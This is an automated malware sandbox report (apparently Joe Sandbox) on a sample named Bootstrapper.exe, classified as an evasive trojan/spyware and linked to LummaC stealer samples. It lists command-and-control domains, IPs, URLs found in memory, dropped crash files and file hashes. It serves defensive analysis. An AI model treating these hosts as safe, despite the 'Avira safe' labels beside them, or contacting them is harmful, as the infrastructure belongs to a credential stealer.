            miniatureyu.lat0%Avira URL Cloudsafe
            savorraiykj.lat0%Avira URL Cloudsafe
            https://jubbenjusk.biz/f0%Avira URL Cloudsafe
            https://jubbenjusk.biz/q0%Avira URL Cloudsafe
            bloodyswif.lat0%Avira URL Cloudsafe
            https://jubbenjusk.biz/w0%Avira URL Cloudsafe
            https://jubbenjusk.biz:443/api0%Avira URL Cloudsafe
            https://jubbenjusk.biz/Gsw0%Avira URL Cloudsafe
            https://jubbenjusk.biz/apit0%Avira URL Cloudsafe
            https://jubbenjusk.biz/S0%Avira URL Cloudsafe
            washyceehsu.lat0%Avira URL Cloudsafe
            https://jubbenjusk.biz/isg8orLIezaCPJdZDugxu0%Avira URL Cloudsafe
            https://jubbenjusk.biz/api0%Avira URL Cloudsafe
            https://jubbenjusk.biz/2YmA0%Avira URL Cloudsafe
            jubbenjusk.biz0%Avira URL Cloudsafe
            finickypwk.lat0%Avira URL Cloudsafe
            https://jubbenjusk.biz/Y0%Avira URL Cloudsafe
            https://jubbenjusk.biz/isg8orLIezaCPJdZDugx0%Avira URL Cloudsafe
            leggelatez.lat0%Avira URL Cloudsafe
            shoefeatthe.lat0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            jubbenjusk.biz
            		172.67.219.181
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              kickykiduz.lattrue
              • Avira URL Cloud: safe
              		unknown
              bloodyswif.lattrue
              • Avira URL Cloud: safe
              		unknown
              savorraiykj.lattrue
              • Avira URL Cloud: safe
              		unknown
              miniatureyu.lattrue
              • Avira URL Cloud: safe
              		unknown
              washyceehsu.lattrue
              • Avira URL Cloud: safe
              		unknown
              https://jubbenjusk.biz/apitrue
              • Avira URL Cloud: safe
              		unknown
              jubbenjusk.biztrue
              • Avira URL Cloud: safe
              		unknown
              finickypwk.lattrue
              • Avira URL Cloud: safe
              		unknown
              shoefeatthe.lattrue
              • Avira URL Cloud: safe
              		unknown
              leggelatez.lattrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://jubbenjusk.biz/apimsBootstrapper.exe, 00000000.00000003.2278322139.00000000008EC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/chrome_newtabBootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://jubbenjusk.biz/api1vkBootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://jubbenjusk.biz/LiBootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://jubbenjusk.biz/fBootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://jubbenjusk.biz/Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2288842178.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279169456.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279121154.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://jubbenjusk.biz/qBootstrapper.exe, 00000000.00000003.2218728998.00000000008D0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://jubbenjusk.biz/apitBootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://crl.rootca1.amazontrust.com/rootca1.crl0Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.4.drfalse
                          		high
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://ocsp.rootca1.amazontrust.com0:Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://jubbenjusk.biz/wBootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.ecosia.org/newtab/Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://jubbenjusk.biz/GswBootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ac.ecosia.org/autocomplete?q=Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://jubbenjusk.biz:443/apiBootstrapper.exe, 00000000.00000003.2244898752.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jubbenjusk.biz/isg8orLIezaCPJdZDugxuBootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://jubbenjusk.biz/2YmABootstrapper.exe, 00000000.00000003.2260094816.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.microhBootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266468578.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218919187.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278363178.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266368056.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://x1.c.lencr.org/0Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://x1.i.lencr.org/0Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://jubbenjusk.biz/SBootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://jubbenjusk.biz/YBootstrapper.exe, 00000000.00000003.2232704430.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2232633454.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://jubbenjusk.biz/isg8orLIezaCPJdZDugxBootstrapper.exe, 00000000.00000003.2245574445.0000000002EFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://support.mozilla.org/products/firefoxgro.allBootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.mozilla.orBootstrapper.exe, 00000000.00000003.2248103085.0000000002F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    172.67.219.181
                                                    		jubbenjusk.bizUnited States
                                                    		13335CLOUDFLARENETUStrue

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1589391
                                                    Start date and time:2025-01-12 07:09:16 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 5m 52s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:7
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Bootstrapper.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 1
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 13.107.246.45, 40.126.32.76, 52.149.20.212, 172.202.163.200
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target Bootstrapper.exe, PID 1036 because there are no executed function
                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    01:10:18API Interceptor7x Sleep call for process: Bootstrapper.exe modified
                                                    01:10:31API Interceptor1x Sleep call for process: WerFault.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttp://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/Get hashmaliciousUnknownBrowse
                                                    • 104.21.56.69
                                                    http://www.telegramstg.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.22.141
                                                    http://www.eovph.icu/Get hashmaliciousUnknownBrowse
                                                    • 104.21.1.232
                                                    http://app-metamask.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    http://www.grhga.icu/Get hashmaliciousUnknownBrowse
                                                    • 104.21.57.146
                                                    http://keystonerelated.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.16.123.96
                                                    http://www.eghwr.icu/Get hashmaliciousUnknownBrowse
                                                    • 172.67.144.208
                                                    https://telegrams-mc.org/Get hashmaliciousUnknownBrowse
                                                    • 188.114.97.3
                                                    http://www.telegramdd.org/Get hashmaliciousUnknownBrowse
                                                    • 172.67.193.48
                                                    http://metamaeskloegin.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                    • 172.64.151.8

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    a0e9f5d64349fb13191bc781f81f42e1x.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    SDIO_R773.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    176.113.115.170_3.ps1Get hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    4kN17cL4Tn.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    5tmmrpv3dn.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.219.181
                                                    b0cQukXPAl.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    Q7QR4k52HL.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    xNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181
                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.181

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Bootstrapper.exe_20aeee6059e0b9475e9d4220ba88ed25a259b88a_d9c2048d_2d34d697-c1d1-4dfc-9924-1581fa6b6e77\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.0376670003175699
                                                    Encrypted:false
                                                    SSDEEP:192:4aXjvOJ0AP3qIjsFmdzuiFKZ24IO8+rx:ZjvOqAP3qIjbzuiFKY4IO8+r
                                                    MD5:5479272BD2E51139E41A0E4582B3C05B
                                                    SHA1:821B37531EDD447ECD490F1933AD62F4DDFB2250
                                                    SHA-256:4A46E070313F60DF3A2E038C452941B19DF5CC8C311AE5B269036BEEA06A9299
                                                    SHA-512:F54D10E821C6E0096377B4387F0D57813C850EDEE5008E465CBE940B8E039B640A66018B9B61CE61D0D9E892529A983E72A3F98F7925B69C355041EE0AD48846
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.3.5.8.2.8.5.1.8.5.9.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.3.5.8.2.9.0.3.4.2.2.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.3.4.d.6.9.7.-.c.1.d.1.-.4.d.f.c.-.9.9.2.4.-.1.5.8.1.f.a.6.b.6.e.7.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.2.1.a.0.f.e.8.-.6.b.f.0.-.4.6.e.1.-.8.7.9.b.-.5.f.b.5.7.e.8.c.9.0.9.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.0.c.-.0.0.0.1.-.0.0.1.5.-.6.7.6.a.-.f.0.a.4.b.8.6.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.9.a.6.9.f.1.2.8.7.b.e.b.5.b.2.c.f.7.d.5.b.1.e.b.3.b.a.8.9.6.0.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.b.4.a.8.c.7.c.a.f.3.9.7.a.3.6.2.9.e.0.1.5.6.d.a.2.5.9.4.d.e.1.b.6.5.7.7.7.6.!.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE00A.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sun Jan 12 06:10:28 2025, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):49032
                                                    Entropy (8bit):2.5397758726529336
                                                    Encrypted:false
                                                    SSDEEP:192:NXg3XTGDGnQQjH4Op1B0/mgXSU40smQKIzDV99qUsRylz1FtT7k4h:NFDy3T/7B+mgXnsmngjsRkntvk4h
                                                    MD5:8CAAA0138C8095FF0DB1AA244842157A
                                                    SHA1:BFBC00D9D4C8C9CB6E061CECEAC841B0CDD6D227
                                                    SHA-256:042FDF787610A667E05A69BAD39744DC13F0353B7CE1FE121DBBB265D31C317E
                                                    SHA-512:CAFDACF7572B0395B5CE935BC81160CAD0F201387D313889C2EF042621BA19DB7CD87F1CAD20EB0A54520427B48C156649A041A7882FA3010E2D2790B56314A8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... ........\.g............4...............H.......,....!......t....3..........`.......8...........T............D...z..........4".......... $..............................................................................eJ.......$......GenuineIntel............T............\.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE144.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8436
                                                    Entropy (8bit):3.6961459402610704
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJMRm67t6Y2DJSU9rgJgmfFkopDM89bQ6sfOmwm:R6lXJMA67t6YUSU9rmgmfFkcQZf1
                                                    MD5:2C0F7B1FA55BEC3B51C1CA2C8B335BFE
                                                    SHA1:B9FC00010614A843DC99B3F3FB936F05DC10C02D
                                                    SHA-256:0E0C08AA2E98BBDB8DE70D212958A8625870F7B75096808B46C5F128ED853D16
                                                    SHA-512:1F42C28D8519BECE576C17185C3CF699040DC119768ACAF5718FA782ACF455098CA75ED38DDBC5A7FA9A048F6B3893A1B7628237A2A3F44DBC7C1BF09AC2C01C
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.3.6.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE173.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):4.469268778118573
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs6Jg77aI9WRWpW8VYHYm8M4J3/NO3FZ+q8vh/NOPCEped:uIjfII7AA7VXJVgKn8CEped
                                                    MD5:98CF3834DC8738C0767D7E3D2071F50A
                                                    SHA1:ADAE581335FEC0CAEA12C7006B3DA63A3AD4485B
                                                    SHA-256:B4281C506AD51A3A0492CC4EB53766CBBBB908C37E2263F47D21015BFBBBD03E
                                                    SHA-512:27491586B25C77CFD03849B8999B7A6C8BC819254EE253C69F5CB89234739B2DF4A9917252D913E44EAFA79251572DDA7297B204F687EB15B81642521AFE0E5A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672313" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.468582659273458
                                                    Encrypted:false
                                                    SSDEEP:6144:MzZfpi6ceLPx9skLmb0fpZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5S:yZHtpZWOKnMM6bFpJj4
                                                    MD5:5F543FFF8EFD15930BD74E105005F715
                                                    SHA1:2922770E786FAD1067A97C76D73A0164F9C92CB6
                                                    SHA-256:1C57D67D2A5D371182139B8E2A7FA001528F81DF337B6D4D127A197BD00D1FAD
                                                    SHA-512:A6CF80783F0C324988A3819CC0E4CFEA851D23CF9A2A852BE5D71D08DD573AD0106AB3401D51F8EF8D975F884472ECB35C988299ABF70D3B60A43ABE3DC4EFF4
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..o..d................................................................................................................................................................................................................................................................................................................................................y.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.732407581671554
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Bootstrapper.exe
                                                    File size:404'992 bytes
                                                    MD5:a9370df5fb60672577fd727e3e798e75
                                                    SHA1:a5b4a8c7caf397a3629e0156da2594de1b657776
                                                    SHA256:481a9e582ab314faa2ab950fc99ab39fc35c071bfaf45871089892129be66d55
                                                    SHA512:f72305b18065adf66f886f5e7a7b2c4a1196c2f2c881a5d7afa7dfb88aad069c0ad2ad47c814e9c193ea1b43b488c2784b1ea135ff0a012857ea28164dd5e94c
                                                    SSDEEP:6144:ux09BNmcrazYrGakdpRylUl1ScNezRTz8WAwPyZtdDy2bkd:uy9PhazGGpcUTSc4xYWAFdDyGk
                                                    TLSH:6C84AE1266FDE9D0F3B38B31EE3E8AE8662FB5665E24A65D3144671F08743A0C572703
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................Rich............PE..L......f.................4.

                                                    File Icon

                                                    Icon Hash:1b6d6c6cf8f07196

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4014b7
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
